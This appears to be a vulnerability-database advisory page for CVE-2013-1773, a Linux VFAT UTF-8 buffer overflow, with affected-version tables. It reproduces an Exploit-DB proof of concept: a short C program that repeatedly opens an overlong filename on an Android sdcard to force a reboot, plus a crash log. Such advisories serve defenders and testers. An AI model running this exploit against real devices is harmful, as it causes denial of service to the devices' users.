CVE-2013-1773

medium
Published 2013-02-28 · Modified 2026-04-29
CVSS v3: -
CVSS v4: - (not yet in upstream)
VIR risk: 7.2

Description

Buffer overflow in the VFAT filesystem implementation in the Linux kernel before 3.3 allows local users to gain privileges or cause a denial of service (system crash) via a VFAT write operation on a filesystem with the utf8 mount option, which is not properly handled during UTF-8 to UTF-16 conversion.

Predictions

Exploit likelihood: 55%
Patch ETA: -

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-23248 dos android verified text · 3 KB
G13 · 2012-12-09

Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)

text exploit Source: Exploit-DB
# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
#

##### Vulnerability #####

The Android OS is vulnerable to a local DoS when a filename with a length of 2048
or larger is attempted to be written to the sdcard (vfat fs) multiple times.

The result of successful running of the exploit code is the system restarting.

The vulnerability only affects Android kernels that are in the version 2.6 family.

##### Vendor Timeline #####

The Android Security Team has been contacted with updated PoC code and details.

They have been aware of this vulnerability for over a year.

##### Tombstone #####

*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint:
'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService  >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d

backtrace:
    #00  pc 0000dcf0  /system/lib/libc.so (kill+12)
    #01  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #02  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #03  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #04  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #05  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #06  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #07  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #08  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #09  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #10  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #11  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #12  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #13  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #14  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #15  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #16  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)

##### PoC #####

#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {
  char buf[5000];
  int j,k;
  FILE *fp;
  /* Path to sdcard, typically /sdcard/ */
  strcpy(buf,"/sdcard/");
  for(k=0;k<=2048;k++){
    strcat(buf,"A");
  };
  for(j=0;j<=50;j++){
    fp=fopen(buf,"w");
  };
return 0;
}

OS impact

Linux kernel (linux): Affected, 89 releases
Version | Status | Fixed in
3.3 | Affected | -
3.2.30 | Affected | -
3.2.29 | Affected | -
3.2.28 | Affected | -
3.2.27 | Affected | -
3.2.26 | Affected | -
3.2.25 | Affected | -
3.2.24 | Affected | -
3.2.23 | Affected | -
3.2.22 | Affected | -
3.2.21 | Affected | -
3.2.20 | Affected | -
3.2.19 | Affected | -
3.2.18 | Affected | -
3.2.17 | Affected | -
3.2.16 | Affected | -
3.2.15 | Affected | -
3.2.14 | Affected | -
3.2.13 | Affected | -
3.2.12 | Affected | -
3.2.11 | Affected | -
3.2.10 | Affected | -
3.2.9 | Affected | -
3.2.8 | Affected | -
3.2.7 | Affected | -
3.2.6 | Affected | -
3.2.5 | Affected | -
3.2.4 | Affected | -
3.2.3 | Affected | -
3.2.2 | Affected | -
3.2.1 | Affected | -
3.2 | Affected | -
3.1.10 | Affected | -
3.1.9 | Affected | -
3.1.8 | Affected | -
3.1.7 | Affected | -
3.1.6 | Affected | -
3.1.5 | Affected | -
3.1.4 | Affected | -
3.1.3 | Affected | -
3.1.2 | Affected | -
3.1.1 | Affected | -
3.1 | Affected | -
3.0.44 | Affected | -
3.0.43 | Affected | -
3.0.42 | Affected | -
3.0.41 | Affected | -
3.0.40 | Affected | -
3.0.39 | Affected | -
3.0.38 | Affected | -
3.0.37 | Affected | -
3.0.36 | Affected | -
3.0.35 | Affected | -
3.0.34 | Affected | -
3.0.33 | Affected | -
3.0.32 | Affected | -
3.0.31 | Affected | -
3.0.30 | Affected | -
3.0.29 | Affected | -
3.0.28 | Affected | -
3.0.27 | Affected | -
3.0.26 | Affected | -
3.0.25 | Affected | -
3.0.24 | Affected | -
3.0.23 | Affected | -
3.0.22 | Affected | -
3.0.21 | Affected | -
3.0.20 | Affected | -
3.0.19 | Affected | -
3.0.18 | Affected | -
3.0.17 | Affected | -
3.0.16 | Affected | -
3.0.15 | Affected | -
3.0.14 | Affected | -
3.0.13 | Affected | -
3.0.12 | Affected | -
3.0.11 | Affected | -
3.0.10 | Affected | -
3.0.9 | Affected | -
3.0.8 | Affected | -
3.0.7 | Affected | -
3.0.6 | Affected | -
3.0.5 | Affected | -
3.0.4 | Affected | -
3.0.3 | Affected | -
3.0.2 | Affected | -
3.0.1 | Affected | -
3.0 | Affected | -
- | Affected | -

Red Hat (redhat): Affected, 1 release
Version | Status | Fixed in
6.0 | Affected | -

Debian (debian): Fixed, 5 releases
Version | Status | Fixed in
trixie | Fixed | 3.2.15-1
sid | Fixed | 3.2.15-1
forky | Fixed | 3.2.15-1
bullseye | Fixed | 3.2.15-1
bookworm | Fixed | 3.2.15-1

References

CWEs

CWE-119
